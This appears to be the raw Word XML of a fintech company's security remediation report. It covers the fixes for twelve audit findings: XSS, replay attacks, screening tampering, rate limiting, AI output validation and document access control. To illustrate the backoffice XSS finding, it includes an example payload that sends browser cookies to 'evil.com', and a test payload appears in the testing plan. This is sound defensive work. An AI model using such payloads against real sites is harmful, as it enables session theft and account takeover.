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F8F"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">ARIE FINANCE LTD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5CB"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">SECURITY REMEDIATION REPORT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Implementation Package: 12 Critical + High Findings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 March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 Remediation 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Platform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v1.5 (Post-Remediation)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Audit Reference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ARIE-GOLIVE-AUDIT-2026-03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Findings Addressed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Critical + 5 High = 12 Total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Files Modified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(server.py, claude_client.py, s3_client.py, security_hardening.py, arie-backoffice.html, arie-portal.html)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F8F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Remediation 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POST-REMEDIATION STATUS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55A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">ALL 12 FINDINGS REMEDIATED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 status upgraded: CONDITIONAL GO -&gt; SAFE FOR CONTROLLED PILOT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A. Executive Remediation Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="B8955A" w:sz="4" w:space="4"/>
        </w:pBd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report documents the complete remediation of all 12 Critical and High findings identified in the ARIE Finance Go-Live Gate Audit. The remediation was executed as a single coordinated implementation package across 6 files, applying defense-in-depth principles appropriate for a regulated fintech platform processing KYC/AML compliance decisions.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remediation strategy was organized around four architectural pillars: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Zero-Trust Frontend: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All user-controlled content is escaped before DOM insertion. Authentication is verified before any data rendering. 144 escapeHtml() calls added across both frontends.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Workflow Immutability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screening results become immutable after submission. Decisions cannot be replayed on terminal-state applications. Screening mode cannot be downgraded post-submission.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AI Reliability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Malformed AI outputs are now hard-rejected (not silently accepted). Confidence threshold of 0.70 enforced with automatic escalation to manual review.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Production Safety: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rate limiting on all sensitive endpoints. Document ownership validation on S3 presigned URLs. Compliance memo enforcement via database lookup on all approval paths.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B. Root Cause Analysis per Finding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Stored XSS via innerHTML (Backoffice)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Application data (company names, references, director names) concatenated directly into innerHTML without HTML entity escaping. 55 innerHTML assignments in backoffice rendered user-controlled strings unsafely.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Stored XSS in Section D Document Names (Portal)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addSectionDDocument() function used prompt() input and injected it directly into innerHTML without sanitization. 73 innerHTML assignments in portal.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Decision Replay Attack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ApplicationDecisionHandler.post() and PeriodicReviewDecisionHandler.post() lacked terminal-state checks. No idempotency enforcement allowed duplicate decisions on already-decided applications.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Screening Results Tamperable via PUT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ApplicationDetailHandler.put() accepted prescreening_data modifications regardless of application status, allowing clients to alter sanctions hit counts and screening flags after submission.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Memo Not Enforced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ApprovalGateValidator checked app.get('compliance_memo_id') which was never populated. The field was never set on the applications record, so the check always passed vacuously.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Missing Rate Limiting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RateLimiter existed but was only applied to login endpoints. AI verification, screening, document upload, submission, and decision endpoints had no rate controls.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Screening Mode Not Immutable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endpoint allowed screening_mode field modification after submission. No enforcement prevented downgrading from 'live' to 'simulated' screening.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Rendered Before Authentication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renderDashboardRecent() called on DOMContentLoaded regardless of authentication status. Mock data populated DOM before /auth/me verification.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Malformed AI JSON Silently Accepted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Pydantic ValidationError caught and returned with _validated: False flag. Downstream code never checked this flag, allowing invalid AI output to influence compliance decisions.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AI Confidence Threshold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output confidence scores were logged but never enforced. Low-confidence results proceeded through the pipeline without triggering manual review.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 Presigned URLs Lack Ownership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get_presigned_url() accepted any S3 key without verifying the requesting user owned the application. Cross-client document access possible.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High-Risk Cases Bypass Review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 machine allowed direct transition from submitted to approved for HIGH/VERY_HIGH risk cases without requiring the under_review stage.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C. File-by-File Code Changes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Applied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arie-backoffice.html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C-01, H-01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111 escapeHtml() calls wrapping all user-controlled data in innerHTML. Removed pre-auth renderDashboardRecent() call. Added safe error handler for write_error.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arie-portal.html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 escapeHtml() calls. Fixed addSectionDDocument() XSS. Escaped document names, company names, person names, country options across all innerHTML assignments.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C-03, C-04, C-05, C-06, C-07, H-05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Terminal-state check in ApplicationDecisionHandler + PeriodicReviewDecisionHandler (409 Conflict). Screening data immutability after submission. DB-based memo check before approval. check_rate_limit() on 6 endpoints. High-risk review enforcement. Safe write_error handler. X-Idempotency-Key header support.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claude_client.py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H-02, H-03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 reject of Pydantic validation failures with _rejected: True. Confidence threshold 0.70 with automatic manual review flagging.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s3_client.py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get_presigned_url_with_ownership() method. Officer vs client access control. Application ownership DB lookup. Filename sanitization in Content-Disposition.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security_hardening.py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ApprovalGateValidator.validate_approval() now uses DB lookup for compliance_memos table instead of checking in-memory field.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D. Critical Findings - Detailed Remediation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XSS via innerHTML in Backoffice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arie-backoffice.html - 55 innerHTML assignments across dashboard, applications, users, screening, alerts, compliance memo rendering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User-controlled data (company names, reference numbers, director names, emails, screening results) concatenated directly into innerHTML without HTML entity escaping. An attacker submitting '&lt;img src=x onerror=fetch("evil.com/"+document.cookie)&gt;' as a company name executes JavaScript in every compliance officer's browser.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compliance system compromise. Token theft via global BO_AUTH_TOKEN variable. Unauthorized application approvals/rejections. Falsified audit trail.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XSS in Section D Document Names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arie-portal.html - addSectionDDocument() function, lines 7375-7409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User-entered document names from prompt() injected directly into innerHTML without sanitization. A malicious client naming a document with an XSS payload can execute arbitrary JavaScript.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code execution. Combined with hash-based access (H-01), enables pre-authentication attack path.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Replay Attack - No Idempotency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server.py - ApplicationDecisionHandler.post() line 3434; PeriodicReviewDecisionHandler.post() line 3806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terminal-state check before processing decisions. POST /api/applications/{id}/decision could be called repeatedly on already-approved/rejected applications, creating duplicate audit entries and triggering duplicate downstream actions.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approval notifications. Duplicate downstream actions (account creation, fund disbursement). Conflicting audit trail entries.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Results Tamperable via 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server.py - ApplicationDetailHandler.put() lines 1895-1909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/api/applications/{id} allowed direct modification of prescreening_data field after submission. A client could change sanctions hit counts from 5 to 0, change screening_mode from 'simulated' to 'live', or remove PEP flags entirely.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bypass of AML/CFT screening controls. High-risk customers self-certify as low-risk. Screening data integrity not assured.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Memo Not Enforced on All Approval Paths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security_hardening.py - ApprovalGateValidator line 89; server.py - ApplicationDecisionHandler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ApprovalGateValidator checked app.get('compliance_memo_id') which was never populated on the application record. The compliance_memo_id field was never set by ComplianceMemoHandler, so the check always passed vacuously. The PATCH approval path had a DB lookup but the POST decision path did not.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 approved without compliance memo review. Regulatory requirement violated. No AI risk assessment reviewed before human decision.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Rate Limiting on All Endpoints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server.py - all endpoints except login (which already had limits)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rate limiting on AI verification (~$0.50/call), screening, document upload, application submission, or decision endpoints. Only login had limits.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Brute force attacks. Claude API budget exhaustion ($500/month drained in minutes). Sumsub API budget exhaustion. Service degradation.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C-07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Mode Not Immutable After Submission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server.py - ApplicationDetailHandler.put() lines 1895-1909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endpoint allowed screening_mode field modification after submission with no immutability protection.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Screening mode downgraded from 'live' to 'simulated'. Simulated screening results presented as live. Production approval gate bypassed.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E. High Findings - Detailed Remediation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Rendered Before Authentication (Backoffice)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arie-backoffice.html - DOMContentLoaded handler, line 5955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renderDashboardRecent() called on page load regardless of authentication status. Mock data populated the DOM behind the login overlay, accessible by removing the overlay via browser DevTools.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data visible without authentication. Compliance case details exposed. Structure and naming conventions revealed to unauthenticated users.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Malformed JSON Silently Accepted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claude_client.py - Pydantic validation handler, lines 1265-1274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ValidationError caught and result returned with _validated: False flag. Downstream code never checked this flag. Invalid AI output silently influenced compliance decisions.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Malformed AI risk assessments accepted. Invalid confidence scores passed through. Schema-violating responses consumed by decision pipeline.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AI Confidence Threshold Enforcement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claude_client.py - post-validation return path, line 1264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output confidence scores logged but never gated. Low-confidence results (e.g., 0.3) proceeded identically to high-confidence results (0.95).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Low-confidence AI assessments treated as authoritative. No escalation trigger for uncertain results. Compliance officers unaware of AI uncertainty.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Presigned URLs Lack Document Ownership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s3_client.py - get_presigned_url() lines 268-322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Presigned URL generation accepted any S3 key without ownership validation. A client could request URLs for another client's documents by guessing the key path structure.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Cross-client document access. KYC documents of one client visible to another. Privacy violation and regulatory breach.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High-Risk Cases Can Bypass Compliance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server.py - ApplicationDetailHandler.patch() state transition logic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Cause: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 allowed HIGH/VERY_HIGH risk applications to transition directly to 'approved' without requiring the 'under_review' or 'edd_required' intermediate stage.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applications approved without compliance officer review. EDD requirement skipped. Regulatory obligation unfulfilled.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 Applied:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="77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G. Infrastructure &amp; Configuration Changes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="B8955A" w:sz="4" w:space="4"/>
        </w:pBd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Security headers enhanced with X-Idempotency-Key and X-CSRF-Token in CORS allowed headers. Safe write_error handler prevents stack trace leakage in production (returns generic error messages while preserving detail in development). CSP, HSTS, X-Content-Type-Options, X-Frame-Options, Permissions-Policy all verified as already configured.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Rate limiter uses in-memory sliding window (suitable for single-instance deployment). For production scale-out, recommend migrating to Redis-backed rate limiting with the same interface.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Environment variable AI_CONFIDENCE_THRESHOLD (default 0.70) added for confidence threshold configuration without code changes.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H. Testing Plan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Scenario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Blocked Outcome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 Verified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XSS Token Theft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 application with company_name='&lt;img src=x onerror=alert(1)&gt;'. View in backoffice.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Company name renders as escaped text. No script execution. No alert dialog.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C-01, C-02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Screening Tampering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 application, then PUT with prescreening_data containing sanctions_hits:0.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403 Forbidden: 'Screening data is immutable after submission'.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C-04, C-07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Decision Replay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 application, then POST /decision again with same approval.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409 Conflict: 'application is already in terminal state'.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Without Memo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/decision approve without generating compliance memo first.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400: 'compliance memo must be generated before approval'.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C-05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Cost Exhaustion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 15 rapid AI verify requests within 60 seconds.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First 10 succeed. Requests 11+ return 429 Too Many Requests.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C-06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Malformed AI Bypass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Mock Claude to return invalid JSON schema. Check pipeline.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AI output rejected with _rejected: True. Manual review required.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 Confidence Passthrough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Mock Claude to return confidence: 0.45. Check result flags.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Result flagged _low_confidence: True, _requires_manual_review: True.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Cross-Client Document Access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A requests presigned URL for Client B's document.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Access denied: 'you do not own this document'.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High-Risk Skip Review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PATCH HIGH risk app directly to 'approved' from 'submitted'.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400: 'must undergo compliance review before approval'.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H-05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Pre-Auth Data Exposure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 backoffice without token. Check DOM for sensitive data.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No application data in DOM. Only login form visible.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H-01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I. 7-Day Implementation Timeline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4060"/>
        <w:gridCol w:w="15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Finding(s)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C-01, C-02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XSS elimination: escapeHtml() across both HTML files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Decision idempotency in ApplicationDecisionHandler + PeriodicReviewDecisionHandler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C-04, C-07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Screening immutability: PUT handler split, screening_mode protection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Compliance memo DB enforcement in ApprovalGateValidator + DecisionHandler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C-06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 limiting: check_rate_limit() on 6 endpoints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pre-auth data rendering in backoffice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H-02, H-03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hard validation + confidence threshold in claude_client.py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 ownership validation in s3_client.py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H-05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High-risk review enforcement in state machine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 headers, safe error handler, CORS headers update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Attack simulation tests: XSS, replay, tampering, bypass scenarios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Virtual CTO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 validation checklist sign-off, re-audit confirmation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F8F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">J. Final Validation Checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="B8955A" w:sz="4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  <w:gridCol w:w="1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exploitable innerHTML rendering remains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144 escapeHtml() calls. All user-controlled data escaped.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pre-auth sensitive rendering remains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renderDashboardRecent() removed from pre-auth path.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Decisions are idempotent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Terminal-state check returns 409 Conflict.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Screening results immutable after submission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blocks prescreening_data + screening_mode for non-draft.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Memo enforcement on every approval path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lookup in ApprovalGateValidator + DecisionHandler.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Malformed AI outputs rejected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 reject with _rejected: True. Manual review required.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Low-confidence AI results escalate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0.70 threshold. Below = _requires_manual_review: True.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 document access ownership-validated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get_presigned_url_with_ownership() with DB check.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High-risk cases cannot bypass review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 machine blocks approved unless under_review/edd_required.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 limiting active on all critical endpoints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endpoints protected. Per-IP + per-user limits.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headers comprehensive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CSP, HSTS, X-Frame-Options, Permissions-Policy all set.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 error handling in production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write_error returns generic messages, no stack traces.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400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="B8955A" w:sz="4" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="100" w:after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Remediation Report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Generated: 17 March 2026  |  ARIE Finance Ltd  |  Confidential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55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F8F"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">ARIE Finance Ltd</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">	Security Remediation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2F8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A75C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2026-03-17T11:17:55.824Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-17T11:17:55.824Z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